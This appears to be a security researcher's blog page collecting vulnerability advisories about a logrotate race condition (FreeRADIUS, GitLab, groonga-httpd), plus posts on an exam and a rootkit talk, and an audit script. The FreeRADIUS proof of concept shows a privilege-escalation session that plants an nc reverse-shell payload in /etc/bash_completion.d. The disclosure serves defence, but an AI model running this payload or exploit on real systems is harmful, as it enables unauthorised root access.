As soon as root logs in, the reverse shell is executed.</p> <p>Details of the race condition in logrotate can be found at:</p> <ul> <li><a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></li> <li><a href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a></li> <li><a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></li> </ul> <h4>Proof of Concept</h4> <p>The following example illustrates how an attacker who has already gained a shell as user “radiusd” can elevate privileges to “root”. After downloading and compiling, the exploit is executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file containing the reverse shell payload is written into /etc/bash_completion.d/ with owner “radiusd”. As soon as root logs in, the reverse shell is executed and opens a shell on the attacker's netcat listener:</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">git clone</span> https:<span style="color: #000000; font-weight: bold;">//</span>github.com<span style="color: #000000; font-weight: bold;">/</span>whotwagner<span style="color: #000000; font-weight: bold;">/</span>logrotten.git <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten Cloning into <span style="color: #ff0000;">'/tmp/logrotten'</span>... remote: Enumerating objects: <span style="color: #000000;">84</span>, done. 
remote: Counting objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Compressing objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">58</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">58</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Total <span style="color: #000000;">84</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">35</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, reused <span style="color: #000000;">64</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">24</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, pack-reused <span style="color: #000000;">0</span> Unpacking objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. 
<span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> logrotten logrotten.c radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: 
bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span> radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: 
bold;">/</span> total <span style="color: #000000;">20</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">11144</span> Oct <span style="color: #000000;">28</span> <span style="color: #000000;">2018</span> grub <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> radiusd radiusd <span style="color: #000000;">33</span> May <span style="color: #000000;">12</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;if [ \<span style="color: #780078;">`id -u\`</span> -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ nc <span style="color: #660033;">-nvlp</span> <span style="color: #000000;">3333</span> listening on <span style="color: #7a0874; font-weight: bold;">&#91;</span>any<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">3333</span> ... 
connect to <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> from <span style="color: #7a0874; font-weight: bold;">&#40;</span>UNKNOWN<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">55526</span> <span style="color: #c20cb9; font-weight: bold;">id</span> <span style="color: #007800;">uid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">gid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">groups</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></p> <h4>Vulnerable Versions</h4> <p>All versions including 3.0.19</p> <h4>Tested Versions</h4> <p>Name : freeradius<br /> Architecture: x86_64<br /> Version: 3.0.13<br /> Release: 9.el7_5</p> <h4>Impact</h4> <p>An attacker who already achieved a valid shell as user “radiusd” could elevate the privileges to “root”. 
The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h4>Mitigation</h4> <p>Add “su radiusd:radiusd” to all log sections in /etc/logrotate.d/radiusd.<br /> By keeping SELinux in "Enforcing" mode, the “radiusd” user is limited in the directories it can write to.</p> <h4>References:</h4> <ul> <li><a href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a></li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a></li> </ul> <h4>Vendor Contact Timeline</h4> <ul> <li>2019-05-01: Contacting RedHat</li> <li>2019-05-07: RedHat opens issue at the vendor bugtracker</li> <li>2019-05-23: CVE gets assigned to the issue</li> <li>2019-05-24: FreeRadius is skeptical about the “security” impact.</li> <li>2019-11-05: Public disclosure</li> </ul> <h4>Notes</h4> <p>This CVE is disputed because the vendor <a href="https://freeradius.org/security/">stated</a> that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user “radiusd”. CVEs are not only assigned for vulnerabilities but also for exposures that allow an attacker to have a stronger impact after a successful attack.
Therefore we believe that it is important to file this issue as a security related bug.</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> I "tried harder" and passed another exam
https://tech.feedyourhead.at/content/osce <span class="field field--name-title field--type-string field--label-hidden">I &quot;tried harder&quot; and passed another exam</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="osce emblem" data-entity-type="file" data-entity-uuid="0c71047f-4663-40f4-989e-5d8fb52257bb" height="88" src="/sites/default/files/inline-images/offsec-student-certified-emblem-rgb-osce.png" width="687" /></p> <p>The <a href="https://www.offensive-security.com/ctp-osce/">"Offensive Security Certified Expert" (OSCE)</a> is earned by passing an extraordinary exam after the "Cracking The Perimeter" course. <a href="https://tech.feedyourhead.at/content/oscp">The OSCP (Offensive Security Certified Professional)</a> is strongly focused on pentesting. The OSCE is, compared to the OSCP, more about writing exploits. Students learn about <a href="https://www.offensive-security.com/documentation/cracking-the-perimeter-syllabus.pdf">exploiting web vulnerabilities, Anti-Virus evasion, Fuzzing, Buffer Overflows and exploiting network vulnerabilities</a>. After the course I was very proficient in using a debugger like Immunity Debugger or OllyDBG. The OSCE course is different from the OSCP. In the OSCP you have a big lab to practice in, and this guides you in what you have to learn and figure out by yourself. In the OSCE there are a couple of machines and some exercises. You have to find out by yourself how to get a deep understanding of the methods that are used in those exercises.</p> <p>The 48 hour exam was very hard for me. Even though I found some sleep, I really needed most of the time to solve the exercises. In the end I passed the exam on my first attempt. My recommendations for people who want to pass the OSCE are: do the OSCP first because it prepares you for the OSCE.
Go through the <a href="https://www.pentesteracademy.com/course?id=3">SLAE32</a> to practice assembler and shellcoding. During and after the course practice a lot and think about variations of the methods and exploits so that you get a very deep understanding of each course module.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Nov 10 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><a href="/tags/news" hreflang="en">News</a></div> </div> </div> CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system user "git", which might let local users obtain root access because of unsafe interaction with logrotate.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References:</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a></li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a></li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga/-httpd 6.1.5-1</li> <li>Software version: 6.1.5-1</li> <li>User interaction: Not required</li> <li>Impact: Local root</li> <li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The path of the log directory 
of groonga-httpd can be manipulated by user groonga:</p> <pre>
ls -l /var/log/groonga
total 8
-rw-r--r-- 1 root    root    1296 Apr 25 18:44 groonga.log
drwxr-xr-x 2 groonga groonga 4096 Apr 25 18:55 httpd
</pre> <p>The files in /var/log/groonga/httpd/*.log are rotated once a day by logrotate as user root with the following config:</p> <pre>
/var/log/groonga/httpd/*.log {
    daily
    missingok
    rotate 30
    compress
    delaycompress
    notifempty
    create 640 groonga groonga
    sharedscripts
    postrotate
        . /etc/default/groonga-httpd
        if [ x"$ENABLE" = x"yes" ]; then
            /usr/bin/curl --silent --output /dev/null \
                "http://127.0.0.1:10041/d/log_reopen"
        fi
    endscript
}
</pre> <p>Because <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race condition</a>, it is possible for user "groonga" to replace the directory /var/log/groonga/httpd with a symbolic link to any directory (for example /etc/bash_completion.d). logrotate will then place files AS ROOT into /etc/bash_completion.d and set the owner and group to "groonga.groonga". An attacker could simply place a reverse shell into this file.
As soon as root logs in, the reverse shell will be executed.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of /var/log/groonga to root, or by using the "su" option inside the logrotate config file.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Anatomy of a Linux container rootkit https://tech.feedyourhead.at/content/anatomy-of-a-linux-container-rootkit <span class="field field--name-title field--type-string field--label-hidden">Anatomy of a Linux container rootkit</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I gave a talk at the <a href="https://eh19.easterhegg.eu">Easterhegg 2019</a> about a Linux kernel rootkit that can handle containers. I mainly presented my Bachelor work from 2017 with some improvements.</p> <h2>Abstract</h2> <p>Linux Containers are becoming increasingly popular. Therefore, it is likely that there will be an increase in attacks against container systems. After successfully attacking all the security mechanisms of a container system, a “rootkit“ could be planted. This talk provides details of the anatomy of such a rootkit. First the main functions of rootkits are explained. After a brief introduction to Linux Containers and Linux Kernel Rootkits, a Kernel Rootkit called “themaster“, developed by the author of this thesis, is described and explained. Well-known rootkit methods are used to implement functions to hide resources and escalate privileges. Results indicate that in container systems, patching system calls is the preferred method for functions which are globally accessible. For providing rootkit functionality in specific containers, patching the virtual file system is the better approach.
A special backdoor for breaking out of the container is also applied, and “themaster“ operates stealthily.</p> <h2>Talk</h2> <p><iframe allowfullscreen="" frameborder="0" height="576" src="https://media.ccc.de/v/eh19-168-anatomie-eines-containerfhigen-linux-kernel-rootkits/oembed" width="800"></iframe></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><a href="/tags/kernel" hreflang="en">Kernel</a></div> <div class="field__item"><a href="/tags/docker" hreflang="en">Docker</a></div> </div> </div> Details of a logrotate race-condition https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition <span class="field field--name-title field--type-string field--label-hidden">Details of a logrotate race-condition</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Logrotate is prone to a race condition on systems with a log directory that is under the control of a low-privileged user. A malicious user could trick logrotate into creating files in any directory if it is executed as root. This might lead to a privilege escalation.</p> <h2>Description</h2> <p>In the Linux man page logrotate is described as follows:</p> <blockquote> <p><strong>logrotate</strong> is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.</p> </blockquote> <p>On most Linux distributions, logrotate is executed automatically once a day as user root.</p> <p>Logrotate supports different methods for creating new files. For example, the directive "copy" makes a copy of the logfile and "create" creates a new empty logfile after rotating. If someone exchanges the log directory with a symbolic link just before the new logfile is created, logrotate will put the new file into a different directory.</p> <p>As shown in the diagram below, such a scenario can be exploited if logrotate runs as user root and a low-privileged user is in control of the path to the log directory. If this user exchanges the log directory with a symbolic link at the right time, logrotate will write the new file into the linked directory.
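The precondition just stated (logrotate rotating as root while a low-privileged user controls the log directory) is something an administrator can audit for, and the "su" directive named in the Mitigation sections of the FreeRADIUS and groonga-httpd advisories above is the setting that removes it. The following is an added example, not code from the original posts or from the logrotten project: it parses logrotate stanzas in the syntax quoted on this page and flags every log directory that is not root-owned or is group/world-writable, unless "su" hands the rotation to an unprivileged user; the sample config, directory owners and gids are constructed.

```python
"""Audit logrotate stanzas for the precondition described above: logrotate rotating
as root in a log directory that a low-privileged user controls. Added example."""
import os
import pwd
import stat

SCRIPT_DIRECTIVES = {"prerotate", "postrotate", "firstaction", "lastaction", "preremove"}

def parse_logrotate(text):
    """Parse the stanza syntax quoted above into (paths, directives) pairs."""
    stanzas, pending, directives, in_script = [], [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if in_script:                       # skip postrotate/... bodies up to endscript
            in_script = line != "endscript"
            continue
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        if directives is None:              # still collecting path globs before "{"
            if line.endswith("{"):
                pending.extend(line[:-1].split())
                directives = {}
            else:
                pending.extend(line.split())
        elif line == "}":
            stanzas.append((pending, directives))
            pending, directives = [], None
        else:
            name, *args = line.split()
            if name in SCRIPT_DIRECTIVES:
                in_script = True
            else:
                directives[name] = args     # directive -> argument tokens
    return stanzas

def su_user(directives):
    """User named by "su": accepts "su user group" and the "user:group" spelling above."""
    args = directives.get("su")
    return args[0].split(":", 1)[0] if args else None

def audit(stanzas, dir_info=None):
    """Return (pattern, reason) findings; dir_info(dir) -> (owner, gid, mode) or None."""
    dir_info = dir_info or stat_dir_info
    findings = []
    for paths, directives in stanzas:
        su = su_user(directives)
        if su and su != "root":
            continue                        # rotation drops privileges: the mitigation advised above
        for pattern in paths:
            directory = os.path.dirname(pattern)
            info = dir_info(directory)
            if info is None:
                continue
            owner, gid, mode = info
            if owner != "root":
                control = f"owned by {owner}"
            elif mode & stat.S_IWOTH:
                control = "world-writable"
            elif mode & stat.S_IWGRP and gid != 0:
                control = f"writable by group {gid}"
            else:
                continue                    # ACL grants (example 2 above) need getfacl, not stat()
            reason = f"{directory} is {control} while logrotate rotates as root"
            create = directives.get("create", [])   # "create [mode] owner group"
            if len(create) >= 2 and create[-2] != "root":
                reason += f"; the rotated file is handed to user {create[-2]}"
            findings.append((pattern, reason))
    return findings

def stat_dir_info(directory):
    """Real-host provider: owner name, gid and mode of the log directory."""
    if not os.path.isdir(directory):
        return None
    s = os.stat(directory)
    try:
        owner = pwd.getpwuid(s.st_uid).pw_name
    except KeyError:
        owner = str(s.st_uid)
    return owner, s.st_gid, s.st_mode

# Constructed sample: the groonga-httpd stanza quoted above, the FreeRADIUS stanza with
# its advisory's "su" mitigation applied, and ownership mirroring the ls -l output above.
SAMPLE_CONFIG = """
/var/log/groonga/httpd/*.log {
    create 640 groonga groonga
    postrotate
        . /etc/default/groonga-httpd
    endscript
}
/var/log/radius/radacct/logdir/detail {
    su radiusd radiusd
}
"""
SAMPLE_DIRS = {"/var/log/groonga/httpd": ("groonga", 1001, 0o40755),      # gids invented
               "/var/log/radius/radacct/logdir": ("radiusd", 1002, 0o40755)}

def audit_sample():
    return audit(parse_logrotate(SAMPLE_CONFIG), SAMPLE_DIRS.get)
```

On a real host, call `audit(parse_logrotate(open("/etc/logrotate.d/<name>").read()))` per file; the default provider then stats the directories, but ACL grants like those in example 2 still have to be checked with getfacl.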
After that the permissions of the created file will be adjusted and the attacker might have write access to that file.</p> <p><img alt="logrotate race-condition squence diagram" data-entity-type="file" data-entity-uuid="7107350b-2651-4742-bc62-18893ffd5e17" src="/sites/default/files/inline-images/sequence.png" /></p> <h2>Exploit</h2> <p>The race-condition can be exploited by setting a inotify-hook at the logfile. As soon as logrotate hits the logfile, the exploit gets notified and exchanges the log directory by a symbolic link to /etc/bash_completion.d. Logrotate will then create the new logfile into /etc/bash_completion.d as root and will adjust the owner and permissions of that file afterwards. The new logfile will be writable if logrotate is configured to set the owner of the file to the uid of the malicious user. Therefore the attacker can write a payload for a reverse shell into this file. As soon as root logs in, the reverse shell will be executed and spawns a root shell for the attacker.</p> <p>An implementation of such an exploit could be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <p>Using inotify has its limitations. It is too slow on filesystems that are on top of lvm2-volumes or overlayfs.</p> <h2>Examples</h2> <p>The following examples show different setups in which logrotate can be exploited:</p> <h3>1) Logfile owner is a user. Compress option is set</h3> <p>In this example the path is in control of user alice and the “compress”-directive is set in logrotate. The exploit hooks the IN_OPEN-operation of the file file.log.1. 
After the daily run of logrotate, a file with owner alice can be found at <i>/</i><i>etc/bash_completion.d/file.log.1.gz.</i></p> <p>The log directory is inside the home directory of user alice:</p> <pre><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  drwxr-xr-x <span style="color: #000000;">2</span> alice alice <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir </pre></div></pre> <p>Alice has permissions for writing to the logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> alice alice <span style="color: #000000;">200000</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>The directive "compress" is used inside the logrotate configuration:</p> <pre> <code> /home/alice/logdir/file.log { daily rotate 12 missingok notifempty size 1k compress } </code></pre> <p>Alice runs the exploit by setting the hook to file.log.1 and with the parameter for compression. 
The exploit gets executed when cron runs logrotate as root:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">alice@localhost$ ./logrotten -c /home/alice/logdir/file.log.1
Waiting for rotating /home/alice/logdir/file.log.1...
Renamed /home/alice/logdir with /home/alice/logdir2 and created symlink to /etc/bash_completion.d
Done!</pre></div></pre> <p>The compressed logfile is created in /etc/bash_completion.d with owner alice:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-r--r-- 1 alice alice 200053 Apr 30 09:40 /etc/bash_completion.d/file.log.1.gz</pre></div></pre> <h3>2) Logfile owner is root.root, but ACLs permit a user to write the logfile.</h3> <p>This example illustrates a case where the insecure configuration is not obvious. User root owns the complete path and the logfile, but ACLs are set that allow user www-data to modify the directory /var/www/project and the logfile /var/www/project/logdir/file.log. A plain ls -l only hints at this with the "+" after the mode bits; getfacl shows the actual grants. As soon as the rotation triggers the exploit, a new file /etc/bash_completion.d/file.log is created and the ACLs are copied to it.</p> <p>Permissions of the log directory. It is owned by root, but ACLs are in use:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxrwxr-x+ 2 root root 4096 Apr 30 17:09 /var/www/project/logdir</pre></div></pre> <p>The logfile is also owned by root, with ACLs set:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-rw-r--+ 1 root root 12 Apr 30 17:09 /var/www/project/logdir/file.log</pre></div></pre> <p>Access control list of /var/www/project:</p> <pre> <code># file: var/www/project
# owner: root
# group: root
user::rwx
user:www-data:rwx
group::r-x
mask::rwx
other::r-x</code></pre> <p>Access control list of /var/www/project/logdir:</p> <pre> <code># file: var/www/project/logdir
# owner: root
# group: root
user::rwx
user:www-data:rwx
group::r-x
mask::rwx
other::r-x
default:user::rwx
default:user:root:rwx
default:user:www-data:rwx
default:group::r-x
default:mask::rwx
default:other::r-x</code></pre> <p>Logrotate configuration with "create root root":</p> <pre> <code>/var/www/project/logdir/file.log {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create root root
